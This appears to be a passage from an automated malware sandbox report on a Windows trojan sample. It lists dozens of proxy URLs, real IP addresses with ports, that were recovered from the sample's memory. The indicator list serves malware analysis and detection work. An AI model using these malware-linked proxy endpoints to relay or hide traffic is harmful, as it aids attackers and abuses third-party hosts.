                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.182.6.69:41041://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E44000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.182.6.69:46383
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.182.6.69:46383://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.182.6.69:63049
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.182.6.69:63049://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.207.150:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.207.150:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.54.102:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.54.102:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.21.153.16:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.21.153.16:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.214.153.223:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.214.153.223:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.226.148.105:35198
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.226.148.105:35198://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.226.148.105:36366
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.226.148.105:36366://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.227.36.1:1088
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.227.36.1:1088://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.227.37.1:1088
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.227.37.1:1088://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.227.37.49:1088
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.227.37.49:1088://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.249.122.1:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.249.122.1:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.250.240.209:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.250.240.209:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.29.116.3:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.29.116.3:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.35.9.110
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.35.9.110://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.35.9.110:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.36.70.104:46964
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.36.70.104:46964://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.48.126.226:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.48.126.226:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.51.249.135:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.51.249.135:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB00D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.100.207.117:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.100.207.117:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.102.198.154:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.102.198.154:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.112.157.97:8060
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.112.157.97:8060://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.114.101.57:8888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.114.101.57:8888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.180.63.37:54321
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.180.63.37:54321://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.184.139.206:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.184.139.206:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.206.214.4:54321
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.206.214.4:54321://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA99D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA967000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.229.171.150:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.229.171.150:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.242.15.120:15673
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.242.15.120:15673://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.242.190.33:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.242.190.33:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.242.244.23:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.242.244.23:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C754A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.242.3.214:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C754A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.242.3.214:8081://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.243.114.192:8180
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.243.114.192:8180://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.243.177.210:8088
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.243.177.210:8088://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.243.205.1:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.243.205.1:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C917D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C914D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.243.253.113:61507
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C914D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.243.253.113:61507://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.250.46.217
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.250.46.217://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.250.46.217:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.254.198.237:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.254.198.237:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.49.228.234
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.49.228.234://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.49.228.234:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.56.110.204:8989
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.56.110.204:8989://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.74.152.29:8888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.74.152.29:8888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.74.226.8:5001
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.74.226.8:5001://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.74.226.8:5001P
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.88.3.19:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.88.3.19:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCE5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.89.184.18:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.89.184.18:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.90.126.78:8118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.90.126.78:8118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.91.104.88:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.91.104.88:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.91.65.23:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.91.65.23:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.93.52.36:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.93.52.36:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.0.2.243:5430
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.0.2.243:5430://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CEC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.13.116.170:31602
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.13.116.170:31602://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.145.243.247:8082
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.145.243.247:8082://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.151.104.49:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.151.104.49:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.151.104.49:8080HJ
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.156.41.179:21
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.156.41.179:21://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.228.131.169:5000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.228.131.169:5000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.48.68.63:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.48.68.63:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.48.89.119:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.48.89.119:8080://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.51.93.222:443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.51.93.222:443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.51.94.12:443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.51.94.12:443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.7.11.187
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.7.11.187://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.7.11.187:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.104.174.199:23500
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.104.174.199:23500://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.104.87.169:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.104.87.169:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.104.87.169:3128x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.133.16.171:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.133.16.171:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.135.136.60:9090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.135.136.60:9090://proxy
